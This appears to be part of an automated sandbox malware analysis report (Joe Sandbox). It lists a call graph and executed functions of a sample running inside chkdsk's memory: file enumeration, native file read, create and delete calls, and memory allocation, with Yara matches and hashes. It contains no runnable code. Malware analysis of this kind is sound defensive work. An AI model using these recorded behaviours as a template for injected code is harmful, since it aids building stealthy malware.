34452->34454 34455 b37830 LdrLoadDll 34453->34455 34454->34440 34456 b3ad93 34455->34456 34457 b37830 LdrLoadDll 34456->34457 34458 b3adb2 34457->34458 34459 b37830 LdrLoadDll 34458->34459 34460 b3adce 34459->34460 34461 b37830 LdrLoadDll 34460->34461 34462 b3adea 34461->34462 34463 b37830 LdrLoadDll 34462->34463 34464 b3ae09 34463->34464 34465 b37830 LdrLoadDll 34464->34465 34466 b3ae25 34465->34466 34467 b37830 LdrLoadDll 34466->34467 34470 b3ae48 34467->34470 34468 b3e3d0 2 API calls 34469 b3ae9c 34468->34469 34469->34410 34470->34440 34470->34468 34472 b37420 10 API calls 34471->34472 34473 b33786 34472->34473 34474 b33793 34473->34474 34475 b37420 10 API calls 34473->34475 34474->34423 34476 b337a4 34475->34476 34476->34474 34477 b37420 10 API calls 34476->34477 34478 b337bf 34477->34478 34479 b3e3d0 2 API calls 34478->34479 34480 b337cc 34479->34480 34480->34423 34481->34428 34482->34427 34483->34436 34484->34446 34485->34449 34486->34452 34488 b33219 34487->34488 34489 b37830 LdrLoadDll 34488->34489 34490 b33256 34489->34490 34491 b37830 LdrLoadDll 34490->34491 34492 b33274 34491->34492 34493 b37830 LdrLoadDll 34492->34493 34495 b33296 34493->34495 34494 b3331c 34494->34226 34495->34494 34496 b332c0 FindFirstFileW 34495->34496 34496->34494 34497 b332db 34496->34497 34498 b33303 FindNextFileW 34497->34498 34501 b330d0 13 API calls 34497->34501 34498->34497 34500 b33315 FindClose 34498->34500 34500->34494 34501->34497 34502->34269 34504 b3ab76 34503->34504 34506 b3ac76 34503->34506 34505 b37420 10 API calls 34504->34505 34504->34506 34505->34504 34506->34282 34507->34282 34508->34282 34510 b30d25 34509->34510 34511 b2b4a0 LdrLoadDll 34510->34511 34512 b30d8a 34511->34512 34513 b2b4a0 LdrLoadDll 34512->34513 34514 b30dd8 34513->34514 34515 b2e7d0 2 API calls 34514->34515 34516 b30e1f 34515->34516 34517 b30e26 34516->34517 34518 b3acc0 3 API calls 34516->34518 34517->34288 34520 b30e34 34518->34520 34519 b30e3d 34519->34288 34520->34519 34521 b2b4a0 LdrLoadDll 34520->34521 34523 b30e8c 34521->34523 34522 b3ab60 10 API calls 34522->34523 34523->34522 34525 b30f11 34523->34525 34543 b30440 34523->34543 34527 b30f69 34525->34527 34554 b307a0 34525->34554 34528 b3e3d0 2 API calls 34527->34528 34529 b30f70 34528->34529 34529->34288 34531 b309f6 34530->34531 34541 b30a01 34530->34541 34532 b3e4b0 2 API calls 34531->34532 34532->34541 34533 b30a17 34533->34290 34534 b2e7d0 2 API calls 34534->34541 34535 b30cd0 34536 b30ce9 34535->34536 34537 b3e3d0 2 API calls 34535->34537 34536->34290 34537->34536 34538 b3ab60 10 API calls 34538->34541 34539 b30440 11 API calls 34539->34541 34540 b2b4a0 LdrLoadDll 34540->34541 34541->34533 34541->34534 34541->34535 34541->34538 34541->34539 34541->34540 34542 b307a0 10 API calls 34541->34542 34542->34541 34544 b30466 34543->34544 34545 b37420 10 API calls 34544->34545 34546 b304c2 34545->34546 34547 b33770 10 API calls 34546->34547 34548 b304cd 34547->34548 34550 b30650 34548->34550 34552 b304eb 34548->34552 34549 b30635 34549->34523 34550->34549 34561 b30310 11 API calls 34550->34561 34552->34549 34560 b30310 11 API calls 34552->34560 34555 b307c6 34554->34555 34556 b37420 10 API calls 34555->34556 34557 b30837 34556->34557 34558 b33770 10 API calls 34557->34558 34559 b30842 34558->34559 34559->34525 34560->34552 34561->34550 34562->34086 34563->34101 34564->34099 34565->34093 34566 55d9540 LdrInitializeThunk 34570 b2ec0d 34571 b37420 10 API calls 34570->34571 34572 b2ebcf 34571->34572

                                                                        Executed Functions

                                                                        Function 00B331E9 Relevance: 4.6, APIs: 3, Instructions: 108fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 724 b331e9-b3320a 725 b33219-b332a0 call b3e470 call b21060 call b37830 call b21060 call b37830 call b21060 call b37830 724->725 726 b33214 call b3e470 724->726 741 b332a2-b332a4 725->741 742 b3331c-b33324 725->742 726->725 741->742 743 b332a6-b332aa 741->743 743->742 744 b332ac-b332ae 743->744 744->742 745 b332b0-b332d9 call b32550 FindFirstFileW 744->745 745->742 748 b332db-b332de 745->748 749 b332e0-b332e7 748->749 750 b33303-b33313 FindNextFileW 749->750 751 b332e9-b33300 call b330d0 749->751 750->749 753 b33315-b33319 FindClose 750->753 751->750 753->742
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 00B332D1
                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 00B3330E
                                                                        • FindClose.KERNELBASE(?), ref: 00B33319
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: e087d6266e537de7c3881d886d1f84b5cc3f088032b63820a1d25fb8ebf71d50
                                                                        • Instruction ID: c5d3814a5693985705178cc29ed2c566a160ee26ea9b01907f00f111e531f780
                                                                        • Opcode Fuzzy Hash: e087d6266e537de7c3881d886d1f84b5cc3f088032b63820a1d25fb8ebf71d50
                                                                        • Instruction Fuzzy Hash: 5E31A5B59002496BEB20DF64CC86FEF77F8DF54704F244499F948A7181DA70AB85CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B331F0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 755 b331f0-b332a0 call b3e470 * 2 call b21060 call b37830 call b21060 call b37830 call b21060 call b37830 772 b332a2-b332a4 755->772 773 b3331c-b33324 755->773 772->773 774 b332a6-b332aa 772->774 774->773 775 b332ac-b332ae 774->775 775->773 776 b332b0-b332d9 call b32550 FindFirstFileW 775->776 776->773 779 b332db-b332de 776->779 780 b332e0-b332e7 779->780 781 b33303-b33313 FindNextFileW 780->781 782 b332e9-b33300 call b330d0 780->782 781->780 784 b33315-b33319 FindClose 781->784 782->781 784->773
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 00B332D1
                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 00B3330E
                                                                        • FindClose.KERNELBASE(?), ref: 00B33319
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: 1deacab0ff5942a3dcf8cae9cc29e520d99c03fce7513b58c6128043ddb8d2ba
                                                                        • Instruction ID: d129e074920ad1814524e3c93cfd9362586ce86d6e0c15f5315b7891a3c9c180
                                                                        • Opcode Fuzzy Hash: 1deacab0ff5942a3dcf8cae9cc29e520d99c03fce7513b58c6128043ddb8d2ba
                                                                        • Instruction Fuzzy Hash: AA3167B59002487BEB20DB64CC86FEF77FCDB54704F244598F948A7181DA70AB858BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3C95B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00B2E555,00000000,?,00B2E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00B3C985
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: <sxU
                                                                        • API String ID: 3535843008-837359753
                                                                        • Opcode ID: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                        • Instruction ID: c85405612fb403863582e9f2d88c6b147150aff1604d3f21b26555e462b1126e
                                                                        • Opcode Fuzzy Hash: eabc21bdcd6ea92364193cc9ee7acf91f5b54f9ce4ff6891967a2d9bc80cbf6c
                                                                        • Instruction Fuzzy Hash: 3EE012762002146BD610EB98DC45ED77B68DF48760F518495BA1D9B742C131EA1187E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CA0A Relevance: 1.5, APIs: 1, Instructions: 47memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,00B217C4,00000004,00001000,00000000), ref: 00B3CA49
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                        • Instruction ID: bb5982bc9fc553870da48704ff219350ebc87bd18109e48c44ba15db2dd0cd11
                                                                        • Opcode Fuzzy Hash: ea6c9640f696ffcbb8ef467a3fd4bd55dd179215d0a24c7b78f8742336ef80f9
                                                                        • Instruction Fuzzy Hash: 4E01FF76200219ABCB14DF98DC45DAB77ADEF8C354F108559FA499B245C631E8118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3C8DA Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00B37750,00B32C20,FFFFFFFF,00B37233,00000002,?,00B37750,00000002,00B37233,FFFFFFFF,00B32C20,00B37750,00000002,00000000), ref: 00B3C925
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                        • Instruction ID: 82e1d3b465e66e309568e9fceb67142c338b1072957afcd4a77a88bb7beded11
                                                                        • Opcode Fuzzy Hash: 37569995663c40e8c7eafb3225fe40729b80976e86f14d781ad79531e4009e6b
                                                                        • Instruction Fuzzy Hash: DBF0E7B2200208ABCB14DF99DC84EDB77ADEF8C714F118248BA0D97245C631E811CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3C830 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,?,00B3758C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B3758C,?,00000000,00000060,00000000,00000000), ref: 00B3C87D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                        • Instruction ID: dbadb48275371b3ad37d4cd6b042800f44b634d26ed1bd2a31c5c2a22983e8ee
                                                                        • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                        • Instruction Fuzzy Hash: 9CF07FB2215208AFCB48DF89DC85EEB77EDAF8C754F158248BA0D97245D630F851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3C8E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00B37750,00B32C20,FFFFFFFF,00B37233,00000002,?,00B37750,00000002,00B37233,FFFFFFFF,00B32C20,00B37750,00000002,00000000), ref: 00B3C925
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                        • Instruction ID: 5b0927fcb57b4d398e14883e4f17ab3550ef8a036e60419ebcc6cbbd6e0367b0
                                                                        • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                        • Instruction Fuzzy Hash: EEF0AFB2210208ABCB14DF99DC85EEB77ADAF8C754F118248BA0DA7245D630E8118BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3CA10 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,00B217C4,00000004,00001000,00000000), ref: 00B3CA49
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                        • Instruction ID: 7a309df9d2a6dfef832690ded3386297b4c27ba8fd86e84c566cb4ff8047a938
                                                                        • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                        • Instruction Fuzzy Hash: 3EF015B2210208ABCB14DF89DC81EAB77ADAF88754F118148BE0897241C630F810CBB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3C930 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtDeleteFile.NTDLL(00B37552,00000002,?,00B37552,00000000,00000018,?,?,622BA63F,00000000,?), ref: 00B3C955
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                        • Instruction ID: c6c1d35ffe967fa98a557aed8f3c16eecf506f33464f4f576d181d9d1c4ca4ac
                                                                        • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                        • Instruction Fuzzy Hash: ADD017722402146BD610EB99DC89ED77BACDF88760F118495BA1C5B242C630FA1087E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00B3C960 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00B2E555,00000000,?,00B2E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00B3C985
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_b20000_chkdsk.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                        • Instruction ID: 6f0f6b4fbfa0ce2f38675ad5677553fbf527cf2eef8a8a826ca09b5398ac2335
                                                                        • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                        • Instruction Fuzzy Hash: 71D01772200214ABD610EBA9DC89E977BACDF88660F118495BA1C5B242C530FA1086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 26091e0137d3af368f826b369d36b1b5cf0fb7d579825f8456f1bcb1502fd539
                                                                        • Instruction ID: ba8787763dcb8ebac16fe623ed02c152e6d4e6455d5633d60a39405cbad25d91
                                                                        • Opcode Fuzzy Hash: 26091e0137d3af368f826b369d36b1b5cf0fb7d579825f8456f1bcb1502fd539
                                                                        • Instruction Fuzzy Hash: B1900265251000030109A559074451700A6A7D53D1391C025F5046550CDA6188616161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a3aed292d086245f76387931a986abb4b2ce57f62104fd2098a832c01c800a48
                                                                        • Instruction ID: 3f7e10b8e3cbaad90314e3d1f642b60b17b43d1cce90c6403f1d239ef42d4378
                                                                        • Opcode Fuzzy Hash: a3aed292d086245f76387931a986abb4b2ce57f62104fd2098a832c01c800a48
                                                                        • Instruction Fuzzy Hash: ED900265261000020149A559064451B04A5B7D63D13D1C019F5447590CCA6188656361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e7122293ffa1d4b027952172d9766951bbe3476339bed6130fdc207b87644adb
                                                                        • Instruction ID: cfbbd7ee394294556480e362a818dbe13bc07f4a83ba8e58f172ff049efd2cef
                                                                        • Opcode Fuzzy Hash: e7122293ffa1d4b027952172d9766951bbe3476339bed6130fdc207b87644adb
                                                                        • Instruction Fuzzy Hash: 8C9002A124200003410971594454626406AA7E0281B91C025E5045590DC96588917165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 59525b5ee7c21ca1a0c83b140652b8db13138a574e57bc6ad55f303a9906eda1
                                                                        • Instruction ID: 8552d63ad61a9c466a552ac9d5158f8cebfd7d6ca139d866812cf715fd995a05
                                                                        • Opcode Fuzzy Hash: 59525b5ee7c21ca1a0c83b140652b8db13138a574e57bc6ad55f303a9906eda1
                                                                        • Instruction Fuzzy Hash: B590027124100402D104659954486560065A7E0381F91D015A9055555ECAA588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b98cefc0189d42f2c53c4cc12173acd1f1e78243ce0972e8fbc69b1eafdd676f
                                                                        • Instruction ID: 061b3776e3ef88cace44d0dae540578f4f2434ada5719df986bf5da773ef262d
                                                                        • Opcode Fuzzy Hash: b98cefc0189d42f2c53c4cc12173acd1f1e78243ce0972e8fbc69b1eafdd676f
                                                                        • Instruction Fuzzy Hash: 8F90027135114402D114615984447160065A7D1281F91C415A4855558D8AD588917162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 64930ddeac9c906aa98854a1cc6e6897af31dddda88b8ebd96e48733d265bbc9
                                                                        • Instruction ID: b4672a7dcffbbcdd733e0ec7efc7a0db699ab69712268cbd858fd3cd317392a5
                                                                        • Opcode Fuzzy Hash: 64930ddeac9c906aa98854a1cc6e6897af31dddda88b8ebd96e48733d265bbc9
                                                                        • Instruction Fuzzy Hash: AA90026925300002D1847159544861A0065A7D1282FD1D419A4046558CCD5588696361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b94d23b27897d288a10a5b10305f92a426f4e44f4dba6e08a2046aa1ff0c85d9
                                                                        • Instruction ID: d03d0f67bc084240d63926d7ed2e561b1e71d9e6e1df3ba4f780ebf155a023b2
                                                                        • Opcode Fuzzy Hash: b94d23b27897d288a10a5b10305f92a426f4e44f4dba6e08a2046aa1ff0c85d9
                                                                        • Instruction Fuzzy Hash: DC90027124504842D14471594444A560075A7D0385F91C015A4095694D9A658D55B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a1d5c133d2fdb69f50db348f10448f495531dad909b8c3ecca3088a1835f7385
                                                                        • Instruction ID: b67438c46d1e4b980077e39a4f7da64d1f1e6906c52055d56b73440d9929d8b0
                                                                        • Opcode Fuzzy Hash: a1d5c133d2fdb69f50db348f10448f495531dad909b8c3ecca3088a1835f7385
                                                                        • Instruction Fuzzy Hash: 5190027124100802D1847159444465A0065A7D1381FD1C019A4056654DCE558A5977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D9610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
                                                                        • Associated: 00000003.00000002.573083356.000000000568B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.573083356.000000000568F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5570000_chkdsk.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: eea0c49124ce7f26f3f7851408977a80ee776f1541ac88cf8faae0538c2b4244
                                                                        • Instruction ID: ec91ce19c117147232ad0378f70fd7360dd3d77349e5d53c69eba74df6f33bc6
                                                                        • Opcode Fuzzy Hash: eea0c49124ce7f26f3f7851408977a80ee776f1541ac88cf8faae0538c2b4244
                                                                        • Instruction Fuzzy Hash: 2B90027164500802D154715944547560065A7D0381F91C015A4055654D8B958A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.573083356.0000000005570000.00000040.00001000.00020000.00000000.sdmp, Offset: 05570000, based on PE: true
